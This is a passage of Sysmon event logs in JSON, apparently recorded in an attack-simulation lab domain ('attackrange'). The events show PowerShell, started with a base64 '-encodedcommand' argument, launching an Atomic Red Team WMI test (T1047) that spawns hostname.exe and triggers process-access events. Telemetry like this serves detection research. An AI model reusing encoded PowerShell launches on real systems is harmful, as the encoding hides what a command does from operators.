{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":1,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":5,"Task":1,"OpcodeValue":0,"RecordNumber":4950,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process Create:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.677\r\nProcessGuid: {41C8662E-20CE-5F25-0000-0010D8E70700}\r\nProcessId: 4944\r\nImage: C:\\Windows\\System32\\HOSTNAME.EXE\r\nFileVersion: 10.0.14393.0 (rs1_release.160715-1616)\r\nDescription: Hostname APP\r\nProduct: Microsoft® Windows® Operating System\r\nCompany: Microsoft Corporation\r\nOriginalFileName: hostname.exe\r\nCommandLine: \"C:\\Windows\\system32\\HOSTNAME.EXE\"\r\nCurrentDirectory: C:\\Users\\Administrator\\\r\nUser: ATTACKRANGE\\Administrator\r\nLogonGuid: {41C8662E-20CD-5F25-0000-002017A10700}\r\nLogonId: 0x7A117\r\nTerminalSessionId: 0\r\nIntegrityLevel: High\r\nHashes: MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E\r\nParentProcessGuid: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nParentProcessId: 2456\r\nParentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nParentCommandLine: \"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","Category":"Process Create (rule: ProcessCreate)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.677","ProcessGuid":"{41C8662E-20CE-5F25-0000-0010D8E70700}","Image":"C:\\Windows\\System32\\HOSTNAME.EXE","FileVersion":"10.0.14393.0 (rs1_release.160715-1616)","Description":"Hostname APP","Product":"Microsoft® Windows® Operating System","Company":"Microsoft Corporation","OriginalFileName":"hostname.exe","CommandLine":"\"C:\\Windows\\system32\\HOSTNAME.EXE\"","CurrentDirectory":"C:\\Users\\Administrator\\","User":"ATTACKRANGE\\Administrator","LogonGuid":"{41C8662E-20CD-5F25-0000-002017A10700}","LogonId":"0x7a117","TerminalSessionId":"0","IntegrityLevel":"High","Hashes":"MD5=1088BA1BF7CDDFF61ECC51BC0C02FDEF,SHA256=B8DA5A3AE4371E63DFD2F468E29CC23AA6F98A6A357A67955996F8F61E58FBA1,IMPHASH=D210D728CB9D45B4D1827BCE52F7EC6E","ParentProcessGuid":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","ParentProcessId":"2456","ParentImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","ParentCommandLine":"\"powershell.exe\" -noninteractive -encodedcommand WwBDAG8AbgBzAG8AbABlAF0AOgA6AEkAbgBwAHUAdABFAG4AYwBvAGQAaQBuAGcAIAA9ACAATgBlAHcALQBPAGIAagBlAGMAdAAgAFQAZQB4AHQALgBVAFQARgA4AEUAbgBjAG8AZABpAG4AZwAgACQAZgBhAGwAcwBlADsAIABJAG0AcABvAHIAdAAtAE0AbwBkAHUAbABlACAAIgBDADoAXABBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAFwAaQBuAHYAbwBrAGUALQBhAHQAbwBtAGkAYwByAGUAZAB0AGUAYQBtAFwASQBuAHYAbwBrAGUALQBBAHQAbwBtAGkAYwBSAGUAZABUAGUAYQBtAC4AcABzAGQAMQAiACAALQBGAG8AcgBjAGUACgBJAG4AdgBvAGsAZQAtAEEAdABvAG0AaQBjAFQAZQBzAHQAIAAiAFQAMQAwADQANwAiACAALQBHAGUAdABQAHIAZQByAGUAcQBzAA==","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4951,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-20CE-5F25-0000-0010A7CC0700}\r\nSourceProcessId: 2456\r\nSourceThreadId: 5028\r\nSourceImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D8E70700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af0fd2db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae592566|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59ea99|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e635|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-20CE-5F25-0000-0010A7CC0700}","SourceProcessId":"2456","SourceThreadId":"5028","SourceImage":"C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D8E70700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+3332f6|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b5560|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System\\2f3f81fc6bc0aadbef611316a8be12ed\\System.ni.dll+2b4f07|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af0fd2db|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5bd0eb|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a0750|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae5a05e1|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae592566|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59ea99|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e635|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e3b5|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae59e086|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+af04f49b|C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\System.Manaa57fc8cc#\\1452176626224b76c22f0910c41e0ead\\System.Management.Automation.ni.dll+ae55ec1c","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4952,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F61-5F25-0000-0010E7420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {41C8662E-20CE-5F25-0000-0010D8E70700}\r\nTargetProcessId: 4944\r\nTargetImage: C:\\Windows\\system32\\HOSTNAME.EXE\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F61-5F25-0000-0010E7420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{41C8662E-20CE-5F25-0000-0010D8E70700}","TargetProcessId":"4944","TargetImage":"C:\\Windows\\system32\\HOSTNAME.EXE","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4953,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4954,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4955,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:59:10.674","SourceProcessGUID":"{41C8662E-1F63-5F25-0000-0010C3650000}","SourceProcessId":"612","SourceThreadId":"928","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{41C8662E-1F73-5F25-0000-0010A2BC0200}","TargetProcessId":"2804","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:59:11","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:59:10","Hostname":"win-dc-6178966.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":4956,"ProcessID":2804,"ThreadID":3356,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:59:10.674\r\nSourceProcessGUID: {41C8662E-1F63-5F25-0000-0010C3650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 928\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {41C8662E-1F73-5F25-0000-0010A2BC0200}\r\nTargetProcessId: 2804\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+918f|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 